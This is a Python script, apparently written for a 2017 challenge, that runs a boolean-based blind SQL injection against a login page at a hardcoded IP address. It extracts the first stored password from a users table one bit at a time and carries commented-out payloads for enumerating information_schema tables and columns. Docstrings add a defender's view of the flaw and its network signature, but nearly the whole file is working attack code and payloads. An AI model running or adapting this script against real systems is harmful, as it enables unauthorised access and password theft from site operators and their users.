import sys
import requests
# Login endpoint of the (2017 challenge) target; every request below goes here.
url = "http://172.104.131.19/july2017/1.php"
def query(payload):
    """Submit one login attempt and report whether the logged-in marker is absent.

    ``payload`` is sent as the ``login`` form field together with a fixed
    password to the module-level ``url``. Returns 1 when the response body
    does not contain "You are logged in", else 0. The two distinguishable
    responses are the boolean oracle that ``queryLetter`` reads one bit per
    request.

    Defender's view: the oracle only exists because user input reaches the
    SQL query unescaped and because success and failure render differently.
    A parameterised query removes the injection; a login page that answers
    identically for every failure removes the side channel. On the wire this
    shows up as a burst of POSTs to the login endpoint whose username field
    carries quote and comment characters.
    """
    data = {
        "login":payload,
        "password":"test"
    }
    r = requests.post(url=url, data=data)
    # NOTE(review): 1 means "marker absent". Whether a true condition shows or
    # hides the marker on this page cannot be told from here; the caller
    # simply parses whatever pattern this produces as a bit.
    if(r.text.find("You are logged in") == -1):
        return 1
    else:
        return 0
def queryLetter(payload):
    """Recover one byte of a value by asking the oracle for each of its 8 bits.

    ``payload`` is a format template with a single ``{}`` that receives the
    bit index 0..7; each filled-in template is passed to ``query`` and the
    returned 0/1 is appended as a character. Bits are gathered
    least-significant first, so the string is reversed before being parsed
    as base 2. The reversed bit string is printed as progress output.

    Returns the byte as an int. Costs exactly 8 HTTP requests per call.
    """
    b = ""
    for i in range(8):
        b += str(query(payload.format(str(i))))
    print(b[::-1])
    return (int(b[::-1], 2))
# Driver: pull character positions 1..99 of the selected value one byte at a
# time and print the accumulated string. The count is fixed rather than
# derived from the value's length, so this always issues 99 * 8 requests and
# keeps going past the end of the string (trailing chr(0) bytes).
# The commented-out templates are the same probe aimed at
# information_schema instead of the users table.
out = ""
for i in range(1, 100):
    # out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select table_name from information_schema.tables limit 1 offset 41),"+str(i)+", 1)) >> {} & 1));#"))
    out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select password from users limit 1 offset 0),"+str(i)+", 1)) >> {} & 1));#"))
    # out += chr(queryLetter("test\' or (1=(ASCII(SUBSTR((select column_name from information_schema.columns where table_name = 'users' limit 1 offset 3),"+str(i)+", 1)) >> {} & 1));#"))
    print(out)